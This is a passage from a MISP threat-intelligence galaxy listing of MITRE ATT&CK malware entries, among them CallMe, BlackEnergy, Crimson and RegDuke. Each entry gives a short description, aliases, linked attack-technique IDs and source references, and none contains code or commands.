https://us-cert.cisa.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20B%29.pdf
https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html [https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html ]

CallMe - S0077

[CallMe](https://attack.mitre.org/software/S0077) is a Trojan designed to run on Apple OSX. It is based on a publicly available tool called Tiny SHell. (Citation: Scarlet Mimic Jan 2016)

The tag is: misp-galaxy:mitre-malware="CallMe - S0077"

CallMe - S0077 is also known as:

CallMe

View relationships graph

CallMe - S0077 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 4790. Table References
Links
https://attack.mitre.org/software/S0077
http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/

Psylo - S0078

[Psylo](https://attack.mitre.org/software/S0078) is a shellcode-based Trojan that has been used by [Scarlet Mimic](https://attack.mitre.org/groups/G0029). It has similar characteristics as [FakeM](https://attack.mitre.org/software/S0076). (Citation: Scarlet Mimic Jan 2016)

The tag is: misp-galaxy:mitre-malware="Psylo - S0078"

Psylo - S0078 is also known as:

Psylo

View relationships graph

Psylo - S0078 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"

Table 4791. Table References
Links
https://attack.mitre.org/software/S0078
http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/

MobileOrder - S0079

[MobileOrder](https://attack.mitre.org/software/S0079) is a Trojan intended to compromise Android mobile devices. It has been used by [Scarlet Mimic](https://attack.mitre.org/groups/G0029). (Citation: Scarlet Mimic Jan 2016)

The tag is: misp-galaxy:mitre-malware="MobileOrder - S0079"

MobileOrder - S0079 is also known as:

MobileOrder

View relationships graph

MobileOrder - S0079 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Cryptographic Protocol - T1032" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Browser Bookmark Discovery - T1217" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 4792. Table References
Links
https://attack.mitre.org/software/S0079
http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/

Kasidet - S0088

[Kasidet](https://attack.mitre.org/software/S0088) is a backdoor that has been dropped by using malicious VBA macros. (Citation: Zscaler Kasidet)

The tag is: misp-galaxy:mitre-malware="Kasidet - S0088"

Kasidet - S0088 is also known as:

Kasidet

View relationships graph

Kasidet - S0088 has relationships with:

similar: misp-galaxy:malpedia="Neutrino" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

Table 4793. Table References
Links
https://attack.mitre.org/software/S0088
http://research.zscaler.com/2016/01/malicious-office-files-dropping-kasidet.html

BlackEnergy - S0089

[BlackEnergy](https://attack.mitre.org/software/S0089) is a malware toolkit that has been used by both criminal and APT actors. It dates back to at least 2007 and was originally designed to create botnets for use in conducting Distributed Denial of Service (DDoS) attacks, but its use has evolved to support various plug-ins. It is well known for being used during the confrontation between Georgia and Russia in 2008, as well as in targeting Ukrainian institutions. Variants include BlackEnergy 2 and BlackEnergy 3. (Citation: F-Secure BlackEnergy 2014)

The tag is: misp-galaxy:mitre-malware="BlackEnergy - S0089"

BlackEnergy - S0089 is also known as:

BlackEnergy
Black Energy

View relationships graph

BlackEnergy - S0089 has relationships with:

similar: misp-galaxy:tool="BlackEnergy" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="BlackEnergy" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Services File Permissions Weakness - T1574.010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing Policy Modification - T1553.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070" with estimative-language:likelihood-probability="almost-certain"

Table 4794. Table References
Links
https://attack.mitre.org/software/S0089
https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf

H1N1 - S0132

[H1N1](https://attack.mitre.org/software/S0132) is a malware variant that has been distributed via a campaign using VBA macros to infect victims. Although it initially had only loader capabilities, it has evolved to include information-stealing functionality. (Citation: Cisco H1N1 Part 1)

The tag is: misp-galaxy:mitre-malware="H1N1 - S0132"

H1N1 - S0132 is also known as:

H1N1

View relationships graph

H1N1 - S0132 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Taint Shared Content - T1080" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encoding - T1132" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 4795. Table References
Links
https://attack.mitre.org/software/S0132
http://blogs.cisco.com/security/h1n1-technical-analysis-reveals-new-capabilities

ROCKBOOT - S0112

[ROCKBOOT](https://attack.mitre.org/software/S0112) is a [Bootkit](https://attack.mitre.org/techniques/T1542/003) that has been used by an unidentified, suspected China-based group. (Citation: FireEye Bootkits)

The tag is: misp-galaxy:mitre-malware="ROCKBOOT - S0112"

ROCKBOOT - S0112 is also known as:

ROCKBOOT

View relationships graph

ROCKBOOT - S0112 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Bootkit - T1542.003" with estimative-language:likelihood-probability="almost-certain"

Table 4796. Table References
Links
https://attack.mitre.org/software/S0112
https://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.html

Linfo - S0211

[Linfo](https://attack.mitre.org/software/S0211) is a rootkit trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Linfo May 2012)

The tag is: misp-galaxy:mitre-malware="Linfo - S0211"

Linfo - S0211 is also known as:

Linfo

View relationships graph

Linfo - S0211 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Transfer - T1029" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 4797. Table References
Links
https://attack.mitre.org/software/S0211
https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf
https://www.symantec.com/security_response/writeup.jsp?docid=2012-051605-2535-99

PS1 - S0613

[PS1](https://attack.mitre.org/software/S0613) is a loader that was used to deploy 64-bit backdoors in the [CostaRicto](https://attack.mitre.org/groups/G0132) campaign.(Citation: BlackBerry CostaRicto November 2020)

The tag is: misp-galaxy:mitre-malware="PS1 - S0613"

PS1 - S0613 is also known as:

View relationships graph

PS1 - S0613 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 4798. Table References
Links
https://attack.mitre.org/software/S0613
https://blogs.blackberry.com/en/2020/11/the-costaricto-campaign-cyber-espionage-outsourced

TINYTYPHON - S0131

[TINYTYPHON](https://attack.mitre.org/software/S0131) is a backdoor that has been used by the actors responsible for the MONSOON campaign. The majority of its code was reportedly taken from the MyDoom worm. (Citation: Forcepoint Monsoon)

The tag is: misp-galaxy:mitre-malware="TINYTYPHON - S0131"

TINYTYPHON - S0131 is also known as:

TINYTYPHON

View relationships graph

TINYTYPHON - S0131 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 4799. Table References
Links
https://attack.mitre.org/software/S0131
https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf

Prikormka - S0113

[Prikormka](https://attack.mitre.org/software/S0113) is a malware family used in a campaign known as Operation Groundbait. It has predominantly been observed in Ukraine and was used as early as 2008. (Citation: ESET Operation Groundbait)

The tag is: misp-galaxy:mitre-malware="Prikormka - S0113"

Prikormka - S0113 is also known as:

Prikormka

View relationships graph

Prikormka - S0113 has relationships with:

similar: misp-galaxy:tool="Prikormka" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"

Table 4800. Table References
Links
https://attack.mitre.org/software/S0113
http://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pdf

YiSpecter - S0311

[YiSpecter](https://attack.mitre.org/software/S0311) iOS malware that affects both jailbroken and non-jailbroken iOS devices. It is also unique because it abuses private APIs in the iOS system to implement functionality. (Citation: PaloAlto-YiSpecter)

The tag is: misp-galaxy:mitre-malware="YiSpecter - S0311"

YiSpecter - S0311 is also known as:

YiSpecter

View relationships graph

YiSpecter - S0311 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"

Table 4801. Table References
Links
https://attack.mitre.org/software/S0311
https://researchcenter.paloaltonetworks.com/2015/10/yispecter-first-ios-malware-attacks-non-jailbroken-ios-devices-by-abusing-private-apis/

BOOTRASH - S0114

[BOOTRASH](https://attack.mitre.org/software/S0114) is a [Bootkit](https://attack.mitre.org/techniques/T1542/003) that targets Windows operating systems. It has been used by threat actors that target the financial sector.(Citation: Mandiant M Trends 2016)(Citation: FireEye Bootkits)(Citation: FireEye BOOTRASH SANS)

The tag is: misp-galaxy:mitre-malware="BOOTRASH - S0114"

BOOTRASH - S0114 is also known as:

BOOTRASH

View relationships graph

BOOTRASH - S0114 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Bootkit - T1542.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden File System - T1564.005" with estimative-language:likelihood-probability="almost-certain"

Table 4802. Table References
Links
https://attack.mitre.org/software/S0114
https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf
https://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.html
https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1498163766.pdf

Rotexy - S0411

[Rotexy](https://attack.mitre.org/software/S0411) is an Android banking malware that has evolved over several years. It was originally an SMS spyware Trojan first spotted in October 2014, and since then has evolved to contain more features, including ransomware functionality.(Citation: securelist rotexy 2018)

The tag is: misp-galaxy:mitre-malware="Rotexy - S0411"

Rotexy - S0411 is also known as:

Rotexy

View relationships graph

Rotexy - S0411 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Alternate Network Mediums - T1438" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1520" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Device Lockout - T1446" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Input Prompt - T1411" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Suppress Application Icon - T1508" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Cryptographic Protocol - T1521" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Evade Analysis Environment - T1523" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1424" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMS Control - T1582" with estimative-language:likelihood-probability="almost-certain"

Table 4803. Table References
Links
https://attack.mitre.org/software/S0411
https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/

HALFBAKED - S0151

[HALFBAKED](https://attack.mitre.org/software/S0151) is a malware family consisting of multiple components intended to establish persistence in victim networks. (Citation: FireEye FIN7 April 2017)

The tag is: misp-galaxy:mitre-malware="HALFBAKED - S0151"

HALFBAKED - S0151 is also known as:

HALFBAKED

View relationships graph

HALFBAKED - S0151 has relationships with:

similar: misp-galaxy:tool="VB Flash" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 4804. Table References
Links
https://attack.mitre.org/software/S0151
https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html

Crimson - S0115

[Crimson](https://attack.mitre.org/software/S0115) is a remote access Trojan that has been used by [Transparent Tribe](https://attack.mitre.org/groups/G0134) since at least 2016.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)

The tag is: misp-galaxy:mitre-malware="Crimson - S0115"

Crimson - S0115 is also known as:

Crimson
MSIL/Crimson

View relationships graph

Crimson - S0115 has relationships with:

similar: misp-galaxy:rat="Crimson" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:tool="Crimson" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Crimson RAT" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Email Collection - T1114.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Time Based Evasion - T1497.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Location Discovery - T1614" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

Table 4805. Table References
Links
https://attack.mitre.org/software/S0115
https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf
https://securelist.com/transparent-tribe-part-1/98127/

RegDuke - S0511

[RegDuke](https://attack.mitre.org/software/S0511) is a first stage implant written in .NET and used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2017. [RegDuke](https://attack.mitre.org/software/S0511) has been used to control a compromised machine when control of other implants on the machine was lost.(Citation: ESET Dukes October 2019)

The tag is: misp-galaxy:mitre-malware="RegDuke - S0511"

RegDuke - S0511 is also known as:

RegDuke

View relationships graph

RegDuke - S0511 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Steganography - T1027.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"

